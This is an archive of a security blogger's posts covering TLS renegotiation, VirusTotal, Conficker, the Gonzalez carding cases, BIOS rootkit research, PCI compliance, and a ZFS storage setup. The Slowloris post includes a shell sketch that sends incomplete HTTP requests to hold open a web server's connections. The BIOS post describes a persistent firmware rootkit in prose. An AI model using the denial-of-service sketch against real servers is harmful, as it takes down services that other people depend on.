Thursday, November 26

Today's Security Variety

I've recently come across a few security-related items of interest that I thought might be useful to everyone.

1. Shodan - a fairly robust internet search engine that can be used to identify specific products and interfaces. From the site:
"SHODAN lets you find servers/ routers/ etc. by using the simple search bar up above. Most of the data in the index covers web servers at the moment, but there is some data on FTP, Telnet and SSH services as well. Let me know which services interest you the most and I'll prioritize them in my scanning."
2. Social Media Governance - a site with resources on organizations' use of social media, including a list of companies such as Walmart, the BBC and the U.S. Air Force along with their social media policies.

3. Wired Story on 9/11 Pager Texts - Looks like Wired is following the WikiLeaks release of pager messages supposedly captured during the 9/11 terrorist attacks. This will be interesting to follow.

Friday, November 13

TLS Renegotiation Vulnerability

As many of you have already heard, a very serious vulnerability has been discovered in the TLS protocol, which is used across the internet to secure many forms of communication, from the browsers used for online banking to the protocols that secure messaging servers.

The vulnerability is a design weakness in the protocol's ability to renegotiate the encryption used in an established session: an attacker can abuse renegotiation to inject chosen plaintext ahead of the victim's data in a long-standing connection.
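For the curious, a quick way to check whether a server still permits client-initiated renegotiation is openssl s_client (a rough spot check, not a full test of the vulnerability; the hostname is a placeholder):

```shell
# Open a TLS session to the server (replace example.com with a host you own).
openssl s_client -connect example.com:443
# Once the handshake details have printed, type a single capital "R" on a
# line by itself and press Enter: s_client then requests a renegotiation.
# "RENEGOTIATING" followed by a clean handshake means the server still
# honors client-initiated renegotiation; an error or dropped connection
# suggests it has been disabled.
```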

Here is a good write-up and links to some other information regarding the issue.

Stay tuned on this one - and expect many patches and workarounds to be issued by vendors.

Wednesday, November 11

RBS WorldPay Reading

Here are a few links to sites that are discussing the details of the RBS WorldPay hack.

SOURCE Conference
Cybercrime and Doing Time
Helpnet Security News

I'm going to try to find out more and maybe provide some additional analysis of how this hack seems to follow the same MO as the other credit/debit card hacks.

Thursday, October 15

Evil Maid and the Challenges of Full Disk Encryption

Joanna and the crew over at Invisible Things have posted a tool to demonstrate how trivial it is to circumvent full-disk encryption products. Evil Maid requires physical access to the machine and the ability to boot it from a USB stick with the software installed; it then transparently records the user's disk passphrase.

This is another example of how full-disk encryption products need to be carefully architected, with attacks like this considered and controls put in place to mitigate them.

Thursday, October 1

NIST SMB Security Guide - Steps in the Right Direction

NIST has published an excellent draft guide on the basics of information security that doesn't throw users into the deep end. It addresses the "certainties" of security risks and provides very basic methods of addressing them, without being too product-focused.

It is likely, although it will depend on the organization, that SMBs will need to work through this guide to understand how their current practices compare to the guidance, and to figure out the most effective ways to address any shortfalls.

I would encourage all security professionals to give the guide a read and provide Richard with comments on improvements to make it as helpful as possible. Just don't be like Gartner's Adam Hills and post a critique before the standard is even published.

Thursday, September 24

Mandating Protection, Society and Seatbelts

There are a number of discussions happening about the differences between risk-based and compliance-based security. These have mostly grown out of discussions around PCI and other imposed standards of control. My opinion is that risk and compliance are both necessary.

Augusto, over at the Security Balance blog, is the latest to discuss the merits of compliance-based security. I share his opinion that creating prescriptive, measurable requirements goes a long way toward improving the security of a large number of organizations. This is a given - I compare it to other compliance programs, like laws regarding the use of seat belts in automobiles. Those laws exist because it is better to give everyone the same level of protection than to measure the specific protections required based on the roads being driven that day, or the specific use of the vehicle, etc.

This doesn't mean that no risk management is being performed - it's just not being performed at the vehicle-operator level, where in many cases people would choose not to wear a seat belt simply because it's inconvenient.

As with seat belt laws, the larger risk that needs to be managed is not at the corporate level but at the societal level. The consequences of security failures at the organization level do not usually gain enough attention to warrant appropriate protection, but I would argue that the consequences of systematic security failures across our society's infrastructure amount to massive harm.

Protecting our society at this level is the responsibility of our governments - and laws should be enacted to require adequate security protection, and impose legal penalties where they are not sufficient.

The identification of information warranting this protection is a required risk-based process. What types of information need to be protected in order to protect our people, our intellect, our industries and our livelihood?

To drive out the waste of objective-less risk management processes, Anton asks this question on his blog:

"What is the risk-driven, correct frequency of changing my email password?"

Attempting to tie specific risks to a combination of a control's failure frequency and the existence of a real threat is surely the wrong way to measure risk. But I think there is still a valid risk discussion to be had about password standards and the use of passwords to protect certain types of information. Let's rephrase:

"Should passwords be managed for systems that are used to communicate financial transaction data?"

This subjective question is far easier to qualify - and to use when debating the merits and extent of the compliance requirements associated with it. Will it make sense in every scenario in every organization? No. But will its application across the majority of scenarios in the majority of organizations help protect our livelihoods as a society? If the answer is yes, it should become a standard.

We need to define a scope of information which should be protected, create the standards to which the information should be protected, and institute formal legal processes to enforce compliance.

This is exactly what the FIPS and NIST standards describe. But these programs need to be extended beyond federally controlled information types, and the rules enforced on all data we value as a society.

Simple and Free File Examination

I know many people who despise running multiple versions of desktop antivirus - one of these programs is usually enough to drop performance to a crawl. For careful people who like to validate the suspect files they receive, there is a great service: VirusTotal.

This service works by accepting uploaded files from users, then running them through a series of tests and virus-scanning engines - currently 41 different ones, to be exact. This makes it extremely useful for gauging how to treat that questionable email attachment. Instead of burning CPU cycles rescanning duplicate files, it hashes each upload; when the hash matches a previously scanned file, it simply returns the stored results to the user.

The other really cool part is that it provides detailed file information by analyzing the file's actual structure. Someone sends you a .jpg - but really it contains Windows executable code ready to infect your machine. Find out what PE information, file structure and signatures exist within the file.
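The hash-matching trick is easy to sketch in shell (a simplified illustration of the idea, not VirusTotal's actual implementation - the scan itself is stubbed out here). The `file` utility makes the related point about mislabeled attachments: it identifies a file by its magic bytes, not its extension.

```shell
#!/bin/sh
# Cache scan results by content hash: identical files are only "scanned" once.
CACHE_DIR=./scan-cache
mkdir -p "$CACHE_DIR"

scan_file() {
    hash=$(sha256sum "$1" | cut -d' ' -f1)
    if [ -f "$CACHE_DIR/$hash" ]; then
        cat "$CACHE_DIR/$hash"          # cached result: no rescan needed
    else
        # Placeholder for the expensive multi-engine scan.
        result="scanned: $(basename "$1")"
        printf '%s\n' "$result" > "$CACHE_DIR/$hash"
        printf '%s\n' "$result"
    fi
}

# A ".jpg" that is really something else is exposed by its magic bytes,
# not its extension:
printf 'MZ' > suspicious.jpg
file suspicious.jpg         # identified by content, not by the .jpg name
scan_file suspicious.jpg
cp suspicious.jpg copy.jpg
scan_file copy.jpg          # same hash: returns the cached result instantly
```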

Best of all, the service is free - and the more people use it, the better its core data set becomes!

Monday, August 24

Gonzalez, Toey - Ringleaders?

It appears that a number of sources, such as the NY Times, are questioning the indictment of Gonzalez as a ringleader. I agree that Gonzalez is wrongly labeled the “ringleader” of the operation - but for different reasons.

1. Gonzalez is likely just a low-level carder (one who gathers and sells credit and debit card information), and one who was once on the Secret Service payroll to infiltrate the carder network. No different from other junkies who break into cars to steal ID information for drug money - he just happened to use a more efficient method. SQL injection and wifi sniffing are not very sophisticated attacks, nor was Albert's MO - it included a very lavish and noisy personal life. He used ICQ to chat with other affiliates and didn't try too hard to protect information related to his wrongdoings.

2. The eastern European individuals named in the indictment appear to be MUCH more sophisticated, as they organize the process of converting the stolen information into cash. These guys are likely the real ringleaders of the operation, as they take the largest share of the profits. They normally operate out of non-extradition countries where they are permitted to operate as they wish. They still slip up from time to time, though, as you can see with Maksym Yastremski sitting in a Turkish prison.

3. Even Gonzalez's lawyer charges that Damon Toey was more of a ringleader than Albert - but in reality both of these guys are simply carders. Good ones, but carders nonetheless, both fencing card information to the European guys overseas for a small piece of the action.

It is my opinion that the US Attorney's offices should describe these truths and these men's actual involvement in the scheme, rather than try to make it falsely appear to the public that they've caught the “ringleaders”. They should equally provide public information on how the whole scheme works. Wikipedia has some decent information for the uninformed, but doesn't get into how the organized portion of the fraud scheme really works. The RCMP even have an information page, but again it just touches on the subject.

Maybe someone can post a link to a better explanation of the entire scheme.

Tuesday, August 18

Albert Gonzalez aka soup Nazi - 130M Records?

So it looks like the same suspect has been charged in both of the biggest credit card theft/fraud cases in history: Albert Gonzalez, aka "segvec," "j4guar17" and "soup Nazi". Who is the man behind these crimes? What was the motivation? What kind of training did this guy have? What MO was used? Two Russian accomplices - who are they?

Secret Service informant? - surely there is a more detailed file on this guy somewhere.

So many questions, so little available information. If anyone has more credible information on this guy, I would be very interested to hear it.

This story appears to have legs...

Wikipedia Page

Update 1:

Stephen Watt, aka “Jim Jones” and “Unix Terrorist,” happened to be one of the unfortunate ones who associated himself with Albert - without any of the financial benefit, however. Wired Story. Here is also a link to a page with his bio from Phrack magazine.

Update 2:

Here is a link to the Google Docs version of the indictment of Gonzalez, Hacker 1 and Hacker 2.

Friday, July 31

Ineffective Laptop Recovery Software + Whitelisted Persistent BIOS Rootkit = Fail!

Following up their bleeding-edge CanSecWest research on BIOS-resident malware, the ultra-smart guys (Alfredo and Sacco) from Core Security have disclosed a significant issue with the laptop recovery software LoJack.

I have debated the effectiveness of laptop recovery software many times, arguing that its cost does not justify the recovery of the hard asset (how much is the laptop hardware worth versus the cost of the recovery service?).

But now it's even worse: with this BIOS-resident software installed (or pre-installed, as it is in an estimated 60% of new laptops - Lenovo, HP, Gateway, Dell, Toshiba), there is significant exposure to having the LoJack software modified by someone malicious. Compounding the issue, the software is already whitelisted by antivirus vendors, meaning such a modification would be neither prevented nor detected.

It's a bit ironic when security software exposes its paying users to much more risk than it addresses. "Get it. And get it back - twice as bad."

Monday, July 27

PCI Compliance - Brand Fines Changing?

It looks like there are some rumors about the payment brands changing their policies on fines levied against non-compliant merchants. Branden's Security Convergence blog is reporting changes to MasterCard's fine schedules for the various merchant levels.

Wednesday, July 22

Top 10 Botnets

An interesting article was posted describing today's top ten botnets, with summary information on their characteristics. The interesting parts are where Conficker showed up (10th) and the fraction of these botnets whose criminal purpose is to collect valuable and sensitive information (1 of 10). It looks like most of them are intended to provide control - and then be capable of whatever the controller wishes.

Thursday, July 16

Twitter Hack - Techcrunch Ethics

There is a real storm of activity after documents were obtained through a hack of a Twitter employee's Google Apps account. Over at TechCrunch, a heated debate over the ethics and newsworthiness of publicly posting the ill-gotten data is beating down on the site's editors.

While it might be entertaining to voice opinions on the ethics of outing the actual information, I think the real story is the lapse in security by the Twitter employee. A bad, guessable password was used to protect access to very sensitive internal data - and this raises an important point about the use of Google Apps or any other easily accessible service.

It really shouldn't take an incident like this for companies to put these simple protections in place. If there is risk related to disclosure of the information - make sure you have it protected.

Wednesday, July 15

Anti-virus Statistics - Motivations

In a study completed and published by Avira, 34 percent of respondents (3,207) said a long-established, trustworthy brand was key. Almost as many, 33 percent (3,077), based their decision on the virus detection rates achieved in independent tests.

Detection rates - let's call this the effectiveness of the control, as it is the key metric used to measure it. It's a skewed metric, though, since the large majority of evaluations (ICSA Labs, VB100, etc.) use the "in-the-wild" (ITW) list of viruses. There is no evaluation of these products' ability to respond to, or even detect, newly released viruses and malware.

In all honesty, what we are really dealing with here is preventative vulnerability management, not virus detection and correction, and in my opinion there are four types of preventative protection required for the average consumer (some are currently reality, others not):

1. Consumers buying products based on their security. This does not exist in any meaningful way for the general community. Let's get someone to independently evaluate software makers on this and publish the results, so consumers can make choices based on vendors' performance.

2. A service to update software code quickly. There should also be an independent evaluation of a product's susceptibility to vulnerabilities and of the speed with which the vendor patches them. This should apply to all software, not just operating systems and browsers. Again, there could be independent evaluations of companies' policies, practices and past performance in this area.

3. A perfect ITW detection engine - 100% - there is no reason a product should score less than this for KNOWN viral code. Really, this should be combined with #4.

4. A product to detect and respond to new threats - ones without signatures - which are a significantly larger threat, as they are generally developed with more financial motivation. Apple's and Microsoft's warnings on unsigned code are a good first step, but this should be done at the CPU level: detect suspicious behavior by software and apply a policy to it. Do consumers actually read a warning about unsigned code, or do they just click "continue"? AMD, Intel, other chip makers - is this possible at a low level? And how do we trust those companies themselves?
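As an aside, OSX already exposes the signature check itself from the shell via codesign (a spot check on one binary, not the behavioral, CPU-level enforcement argued for above; the application path is just an example):

```shell
# Verify the code signature on an application bundle;
# exit status 0 means the signature is present and valid.
codesign --verify --verbose /Applications/Safari.app

# Show the signing details (identifier, authority) for inspection.
codesign --display --verbose=2 /Applications/Safari.app
```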

Anyone else have thoughts on other ways of preventing the impact of vulnerabilities?

Tuesday, July 14

White-hat Budgeting

In response to his recent black-hat budget post, Richard has also described what he would spend the $1 million on in defense, and I commented on it. Turns out it doesn't buy you much - although I agree with his approach of spending the cash on people and their ability to use the tools they already have access to.

I would take a slightly different perspective on the problem, however. The black-hat team's $1 million is not spent in just one place: the same team can move from target to target without spending any additional money, forcing many millions of dollars of defensive spending across multiple companies.

The other reality is that the defense is not defending against just one black-hat team, but against the potential for multiple black-hat teams.

My opinion is that, like the black-hat teams, the defense should base the amount spent on the potential loss of the information (or of availability, if that is the risk). Spending then balances out, because focused efforts protecting the specific information cost less. There is no reason to spend big money on a commercial security management solution to protect only the one database table where the sensitive information lives. The problem is that you have to know where that information lives throughout its life.

Sunday, July 12

Mobile Device Protection - Is this not standard practice yet?

Need any more reasons to guard against the loss of sensitive information on mobile devices? Dell has released the results of a study looking at actual data on lost mobile devices.

Tuesday, June 30

Blackhat Economics - Are you feeling safe today?

Just want to point people to a great post over at TaoSecurity - Black Hat Budgeting. It's an excellent article that starts to examine the economic factors of attacking and protecting information. Thinking this way really puts the security budgets people spend attempting to protect information into perspective. Long story short: if you don't think, or don't know whether, bad guys are targeting you - find out (what information are you protecting, and why?); and if the bad guys are targeting you, you should be thinking this way.

Wednesday, June 17

New HTTP Flooding Tool - Apache Default Configuration

As application-layer vulnerability research keeps driving forward, the guys keep blasting out lots of good stuff. This time it's Slowloris, essentially an HTTP denial-of-service attack on certain types of web servers (very popular ones, too!). At a high level, the attack creates a large number of partial HTTP connections, very similar to the TCP flood attacks of old - but at the application layer rather than the network layer.
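The shape of the attack can be sketched in a few lines of shell (an illustration of the idea only - the target name is a placeholder, and this is not the actual Slowloris tool): each connection sends request headers but never the blank line that completes the request, so the server holds a worker waiting.

```shell
#!/bin/sh
# Emit a deliberately incomplete HTTP request: headers are sent, but the
# terminating blank line never is, so the server keeps the connection
# (and a worker slot) open waiting for the rest.
partial_request() {
    printf 'GET / HTTP/1.1\r\n'
    printf 'Host: %s\r\n' "$1"
    printf 'X-a: keep-waiting\r\n'   # more headers can be trickled later
}

# One held connection would look like this (placeholder target):
#   partial_request target.example | nc target.example 80 &
# Opening a few hundred of these can exhaust a default Apache worker pool.
partial_request target.example
```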

Wednesday, June 10

New Research on RFC1918 Describes Vulnerabilities

Robert Hansen (aka RSnake) released a new paper on June 8th describing vulnerabilities in the way browsers cache content, and how this can be abused when a client accesses content on different networks that use matching internal non-routable (RFC 1918) IP addressing schemes.

The paper describes the limitations of the attacks and the specific conditions that make them possible. It would be prudent to review it and see if any of this applies to you.

Friday, May 29

US Cyber Security Report and Press Conference

As many of you have heard, President Obama has announced the release of the 60-day report and the appointment of a cyber-security czar to provide White House oversight of the initiatives tied to the report's recommendations.

Here are quick links to the PDF report, and to a video (and video part 2) of Obama's press conference with the highlights.

Wednesday, May 20

Java Vulnerability within Fully Patched OSX - POC

Here is an excellent POC that uses JavaScript to exploit an unpatched Java vulnerability from within any browser (Firefox, in my case). Beware of testing the link, though - it attempted to change firewall settings when I visited.

Yet another reason to use a filter like NoScript in the browser!

Here is an excellent explanation of what is going on with this one.

Thanks guys!

Wednesday, May 13

OpenSolaris, ZFS, iSCSI and OSX - Creative Storage - Part II

In part I of this post, I looked at the simple steps required to set up a relatively simple storage solution using OpenSolaris, ZFS, iSCSI and OSX. That was about a month ago, and I've since made some significant changes to how I use it.

At the end of the last post I left off at the configuration of the iSCSI initiator side of the solution. I stopped there because of some issues related to the installation and use of the software.

The iSCSI initiator I was using was Studio Network Solutions' GlobalSAN initiator, which is meant to allow connections to their products. This software will also connect to ANY iSCSI target!

After configuring the iSCSI target on the ZFS pool and installing the client, it was trivial to get a connection established with the storage pool, which showed up in OSX as an unformatted raw disk.

I proceeded to format the disk as HFS+; it then mounted as a locally attached disk and I was able to use it as a target for Time Machine backups. Once selected, OSX nicely backed up all of my data to the volume. Perfect! Even the performance of the solution was surprising: it appeared to significantly outperform previous backups made to USB disks attached to an Airport Extreme - and all of this over my 802.11n network!

Main problem: disconnections. Everything worked really well as long as the wireless connection was active, the iSCSI client was properly started and connected, and the Time Machine backups were closely monitored. While this will likely work well for the guys with hard-wired, gigabit-connected Mac Pros that are never disconnected from the network or turned off, my MO includes constantly connecting and disconnecting from the network - including in the middle of TM backups.

These disconnections immediately started causing problems, both with the iSCSI client's connections to the ZFS pool and with the Time Machine processes tied to the disk. Symptoms included strange errors about mismatches between the sparse disk images and the connected volume, and reconnection issues when my laptop rejoined the network without the iSCSI client being stopped and restarted.

Solution: CIFS. I always believe simple solutions are better than complex ones, and although establishing disk access over iSCSI seems cool, it doesn't offer much over plain old network-attached storage. The main reason for the iSCSI configuration was to get TM working with the ZFS pool, but there is an alternative: CIFS. There are many posts around the net on using CIFS/SMB shares for Time Machine backups.

So what I ended up doing was configuring a single ZFS pool and splitting it in two - one filesystem for general file storage, and one for backups. TM uses sparse disk images, which offer the added benefit of capping the image size (I use this to limit the disk space consumed by TM backups - currently 2x the size of my source disk).
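For reference, creating the size-capped sparse bundle by hand looks something like this (the size, volume name and filename here are examples - TM on a network volume typically expects the image to be named after the machine):

```shell
# Create a growable sparse bundle capped at 500 GB, journaled HFS+.
hdiutil create -size 500g -type SPARSEBUNDLE -fs HFS+J \
    -volname "TM Backup" MyLaptop.sparsebundle

# Allow Time Machine to use network volumes it doesn't officially support.
defaults write com.apple.systempreferences TMShowUnsupportedNetworkVolumes 1
```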

By using CIFS as the access method, I can also back up my Windows boxes to the same filesystem, alongside the TM disk images for each OSX machine.

In part III - when I get time, I will hopefully post the details on the CIFS setup (including security and file permissions), the OSX TM setup, and the Windows backup settings.

I have been using this setup for a few weeks now without a hitch, and I have also restored files over the network. The only thing I haven't tested is restoring a full OSX install from the install DVDs using the TM backup (I plan to test this).

Friday, May 1

PCI Compliance - IT or Legal Issue - New Paper

In a recently published ISSA article, David Navetta shares some excellent insight into the scope of PCI compliance and some of the true risks of managing and delivering on its requirements. You can find the paper here.

Sunday, April 26

New Link, RSA Conference 2009 - Webcasts

The folks at the RSA conference have posted all of the keynote speeches online. There are some good ones, including James Bamford and Jamie and Adam from Mythbusters, among many others throughout the week.

Monday, April 20

New report released! - Office of the Auditor General of Alberta

The latest report from the Office of the Auditor General of Alberta was released this afternoon and contains several findings pointing to specific deficiencies in the processes the Government of Alberta uses to manage information risks, and in the effectiveness of its control environment.

It appears that even though additions and changes to the OAG budget have affected its future plans for auditing security, the office is still moving forward with its audits and recommendations related to information security in the GoA.

Thursday, April 9

New Updates Conficker - April 9th

As expected, the Conficker worm has continued its subtle updates, now using its newly acquired P2P functionality to deliver them. It also appears to be updating the payload functionality, and may be actively defending itself by attacking the availability of the Conficker Working Group site.

Researchers are looking at the new code, and initial analysis points to keylogger software and new protection mechanisms. I think most security professionals would serve their clients well by keeping up to date on this.


It looks like the code is starting to monetize: it installs a scam antivirus package that costs $49.99, and in some cases spam relay software. There are also reports that it is set to delete itself on May 3rd (I'm skeptical about that one).

Time for law enforcement to do their job and follow-the-money!

Sunday, April 5

OpenSolaris, ZFS, iSCSI and OSX - Creative Storage - Part I

After getting through the steps required to set up a local network storage solution, I thought I would publish them for others doing the same thing. Not exactly security-related, but once the Solaris developers implement encryption in ZFS it will be :)

The needs for the solution were simple: network (IP) based storage that is reliable, meets performance needs and doesn't break the bank.

Many people would argue that a hardware RAID array exposed through some NAS protocol would be a much easier answer to this need, but I'm intentionally trying to be cheap. The steps:

1. Hardware installation

Easiest part - install the SATA disks in a platform supported by OpenSolaris. No details here unless someone wants them.

2. Software installation

OpenSolaris 2008.11 - a 1-CD image found here. Burn the ISO, boot into the live CD, double-click the "Install Solaris" icon on the desktop, and follow the instructions. I used many of the default options; the installer will step you through it.

Reboot, and voila - a default Solaris install with an SSH daemon running, so I don't have to use X Windows sessions.

3. ZFS Configuration

Connect to the console with SSH and check the installed disks.

root@CoreOpenSolaris:~# format
Searching for disks...done

0. c0d0 <DEFAULT cyl 1242 alt 2 hd 255 sec 63>
1. c3t0d0 <ATA-WDC WD10EADS-00L-1A01-931.51GB>
2. c3t1d0 <ATA-WDC WD10EADS-00L-1A01-931.51GB>
3. c4t0d0 <ATA-WDC WD10EADS-00L-1A01-931.51GB>
4. c4t1d0 <ATA-WDC WD10EADS-00L-1A01-931.51GB>
Specify disk (enter its number):

The first disk is the boot disk, which also uses ZFS and won't be part of the RAID set. The other four will be.

Create the ZFS pool.

root@CoreOpenSolaris:~# zpool create CoreStorage raidz c3t0d0 c3t1d0 c4t0d0 c4t1d0

root@CoreOpenSolaris:~# zfs list CoreStorage
CoreStorage 400G 2.28T 41.9K /CoreStorage

Once the pool has been created we need to set a few properties to enable the types of access we want to provide. First is enabling CIFS and iSCSI access to the pool.

root@CoreOpenSolaris:~# zfs set shareiscsi=on CoreStorage
root@CoreOpenSolaris:~# zfs set sharesmb=on CoreStorage

4. CIFS Configuration

With the pool set up, we need to configure Solaris to provide connections for CIFS and iSCSI. Let's focus on CIFS first. The CIFS packages are not installed by default, so we need to install them.
root@CoreOpenSolaris:~# pkg install SUNWsmbs SUNWsmbskr

Then add the driver, start the service, and configure the PAM services needed to authenticate properly (I needed to reboot after these steps).
root@CoreOpenSolaris:~# add_drv smbsrv
root@CoreOpenSolaris:~# svcadm enable -r smb/server
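The PAM change itself (as documented for the OpenSolaris CIFS service) is one line appended to /etc/pam.conf, so that subsequent password changes also generate the SMB hashes CIFS needs:

```shell
# Append the SMB password module to the PAM stack; until a user's
# password is changed after this, no SMB hash exists for them.
echo 'other password required pam_smb_passwd.so.1 nowarn' >> /etc/pam.conf
```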

I then needed to reset the password of the user that will be using the share, so that the SMB password hash gets generated.
root@CoreOpenSolaris:~# passwd <username>

Part two will cover the iSCSI target and initiator configuration, and a discussion of the advantages and disadvantages of using this approach.

Wednesday, April 1

Conficker Reporting

There has been so much misinformation spread about what Conficker will or will not do, and now that the mainstream media has picked up the story, they are repeating some of the speculation. I like to look at it in simple terms, without muddling in all the technical details:
  • All the research done suggests that the people behind Conficker are intelligent and well resourced, which indicates that whatever their motivation, it will be very well thought out and executed.
  • The large amount of resources used to develop and maintain Conficker means the owners will spend large amounts of effort defending it and increasing its ability to spread efficiently.
The whole circus around April 1st was about the fact that the software would begin receiving new instructions; in no way did this mean it would start acting more maliciously. The simple fact is that this virus could do anything its controllers want, and we should be prepared to handle that today - or on any other day of the year.

I hope the media starts focusing on the security of computing as a whole - including all the risks, of which worms are only one - and more on the common prevention and detection techniques that can keep us all safer.

Monday, March 30

Older TOR Research Paper - Privacy and Security Study

I stumbled across an older research paper from the University of Colorado discussing the traffic patterns of data flowing into and out of the TOR network. A very interesting read, and I like the inventive methods for detecting "sniffing" exit nodes - although I must say that anyone with a bit of knowledge could quietly listen using tcpdump -n.
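For illustration, the quiet way to capture (the interface name is an example):

```shell
# -n  skip reverse-DNS lookups: resolver queries triggered by sniffed
#     hostnames are exactly the side effect that detection honeypots watch for
# -i  interface to listen on; -w writes raw packets for offline analysis
tcpdump -n -i eth0 -w capture.pcap 'tcp port 80'
```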

Thursday, March 26

Securing OSX - Apple's Leopard Security Guide

Worried about the default configuration of Leopard OSX 10.5? Take a read through Apple's own security configuration guide. It covers everything from installation to advanced configuration options, including turning off hardware support for USB, Bluetooth, video, wireless, etc., for the most paranoid out there.

Mac users can also look forward to more advanced security features as part of the 10.6 release of OS X, Snow Leopard: rumors point to modern security features like enhanced ASLR with a 64-bit memory space and full NX support.

Charlie Miller - Toms Hardware Exclusive

Tom's Hardware has posted an excellent interview with Charlie Miller who was successful at hacking a fully patched OSX box at this year's CanSecWest. Here is the interview. Very insightful answers to the questions.

Wednesday, March 25

SmartPhone Pwn2Own Results Reflect Security of the Device?

Since the CanSecWest conference last week, a few people on the net have been reporting (Gizmodo, Slashdot, Engadget) that because none of the smartphone platforms were compromised (I think there was only a single attempt, if I heard right), these devices must be inherently secure, or at least a lot harder to hack than Safari and the rest of the browser crew.

After hanging out with a few of the researchers at the conference, and witnessing first-hand some of the technical prowess they possess, it seems a little strange to me that the security of these handsets would pose a challenge to these people.

Adding to my skepticism is the fact that many of the researchers at the conference were supporting the stance of "no more free bugs". Which I support - there is a very real, thriving underground economy for bugs and exploits, and researchers deserve to be compensated for their knowledge and expertise, not to mention that the pwn2own contest rules sign over ownership of the bug to TippingPoint (ZDI) for basically the cost of the hardware plus 10K.

My theory on why the smartphones survived the pwn2own ordeal is not that they are uber-secure, but that the researchers who have bugs for them (and based on what these guys can do on platforms that have been hardened for years, they DO have them) felt that the compensation being offered does not come close to the value the bugs have to other potential buyers and for future use.

I would argue that bugs on these platforms are much more valuable than, say, a browser exploit or a Vista hack, given what taking control of a smartphone offers: advanced functionality, a personal connection to the owner, and a general lack of security awareness for the platform.

Anyway, my little theory on smartphone security.

Monday, March 23

A few more details regarding the persistent BIOS infection

If you were lucky enough to attend this year's CanSecWest conference, then you probably sat through Anibal Sacco and Alfredo Ortega's talk on the BIOS infection, and how it would persist even through a hard-drive wipe or operating system reinstall. These guys are extremely bright and are pushing hard at the edge of security research.

The slideshow published by Core Security provides an overview, which I'll summarize here with what I can remember of the technology and tools used in the hack shown at the conference.

First is getting a copy of a BIOS to hack. There are two options, one of which made the researchers' lives easier: VMware supplies both a generic "virtual" BIOS and a debugger, which makes testing and developing the patches easier. They have also created a generic tool to retrieve, modify, and reflash the BIOS, based on previous work by pinczakko.

The second thing talked about is the structure of the BIOS, which gets executed by the CPU when the computer first boots, before the operating system has loaded. The whole point of describing this structure is that BIOS structures differ between manufacturers and models of motherboards, and these differences make it difficult to predict where to make certain changes. The researchers found, however, that almost all modern BIOS versions use an identical decompression routine to expand other pieces of code in the BIOS for devices such as video cards, north and south bridges, etc. This code is easy to find using pattern matching on the BIOS image. Once this section of code is found, it can be patched with a different decompression routine, making the hack possible. The other cool thing, if I'm not mistaken, about the decompression routine is that it is platform independent, meaning it will run on multiple CPU architectures (x86, AMD64, etc.).
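The pattern-matching step can be pictured with a small sketch: scan a BIOS image dump for a known byte signature of the decompression routine and report the offsets where a patch would go. The signature bytes and the fake image below are purely illustrative inventions of mine, not the actual routine the researchers matched on:

```python
def find_decompressor(bios_image: bytes, signature: bytes):
    """Return every offset at which the decompression routine's
    byte signature appears in a raw BIOS image dump."""
    offsets, start = [], 0
    while (pos := bios_image.find(signature, start)) != -1:
        offsets.append(pos)
        start = pos + 1
    return offsets

# Illustrative only: a fake 'BIOS image' with a made-up signature.
SIGNATURE = bytes.fromhex("fc31c0eb05")
image = b"\x00" * 64 + SIGNATURE + b"\x90" * 32
print(find_decompressor(image, SIGNATURE))  # → [64]
```

A real patcher would then overwrite the matched region with the replacement routine and fix up the BIOS checksums so the machine still boots.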

One of the key features of the BIOS is having access to the computer's hardware before the operating system does, which makes things like patching hard disk bytes possible. One just has to know what to search for (password files, ini files, etc.) and changes can be made directly.

They also hint at being able to do other things with the code, like utilizing, accessing, or modifying other devices which are interfaced with at boot time (video, ethernet, RAID, etc.). This is cool because one of the things that loads in most modern BIOSes is netboot, or the Preboot Execution Environment (PXE). Imagine that as the PC boots, a network stack is enabled, a malicious site is contacted for updated code, and additional hacks are performed as desired - it seems like the ultimate, very-hard-to-detect rootkit.

Even more concerning would be the creation of a BIOS-resident blue-pill-type hypervisor.

UPDATE: Alfredo has informed me that they did not develop CoreBoot; they use the great open-source tools found here. Core Security developed their own toolset for these tasks on top of CoreBoot. This toolset contains the code necessary to flash, patch, and calculate the right checksums for the BIOS to work properly. They have not posted it on their public site, and I am not sure if they intend to.

*Very cool stuff indeed.*

Friday, March 20

PII Guide Draft from NIST - SP800-122

SP800-122 is a relatively new draft guideline regarding the protection of the confidentiality of personally identifiable information. Check it out.

Thursday, March 19

Update from CanSecWest

So, most of the way through the second day of the conference, there have been some really interesting topics. Here are the top ones for me:

Unicode vulnerabilities - Although it was cut short due to running over time, Chris Weber from Casaba Security gave an excellent description of a large number of Unicode issues which plague web applications. His favorite: BOM.

Sniffing Keystrokes - What a nice change of pace - the two Italians put on quite a show with two side-channel attacks on keystrokes: one using the electrical noise that poorly shielded PS/2 connectors leak, and the other by recording and analyzing vibrations from typing on laptops using cheap lasers!

Chinese Hacking Culture - Wow, what a great opportunity to hear from a security professional working inside the hacker community in China! Excellent talk, and kudos to ICBM for getting the message across and even answering questions despite a significant language barrier.

More later.

Monday, March 16

Updates from CanSecWest

I am attending CanSecWest this week in Vancouver, British Columbia, and will be updating my blog frequently to recap some of the highlights of the event. Monday will be pretty slow as people make it into town and get settled.

Tuesday, March 10

Prioritizing PCI Compliance Activity

In new guidance offered by the PCI Security Standards Council, a checklist has been provided to assist organizations with focusing on the important issues first, and spending time where the greatest risks exist. This is very useful for organizations with limited funding and resources.

Tuesday, February 24

FISMA - Compliance Guidance Drafted by CSIS

A new draft publication has been made available by the Center for Strategic and International Studies (CSIS), whose goal is:
“Establishing a prioritized baseline of information security measures and controls
that can be continuously monitored through automated mechanisms.”
Based on the inputs of research groups from the public and private sectors, this vendor-neutral document seems to highlight the real need for effective and auditable security controls that aren't somehow linked to the next best product offering.

Zero day targeted threats - don't panic if they are targeted?

According to an IT Knowledge Exchange article, we shouldn't panic, because zero-day threats in software that almost every enterprise has installed are not spreading rapidly and are in most cases targeted.

Aren't these exactly the threats that we should be worried about? In fact, I would argue that for every 0-day threat reported, there are five more unreported. And in cases where the attacks are motivated (targeted), there is likely a greater probability of loss.

In my opinion, the criteria we use to gauge the risk related to vulnerabilities shouldn't include how noisy and fast the infection is, but should instead look at the impact and the probability of being targeted.

Saturday, February 14

Alberta's Audit of IT Security Halted

The Edmonton Journal is reporting that due to budget constraints, four key investigations are being stopped. This includes investigations into the Government's IT security practices.

Although this would appear to be another disappointing effect of the economic situation, I would argue that it makes sense to direct the limited funding into programs which improve the Government's security posture.

Sunday, February 8

ISACA Publication - RISK IT governance processes for managing IT Risks

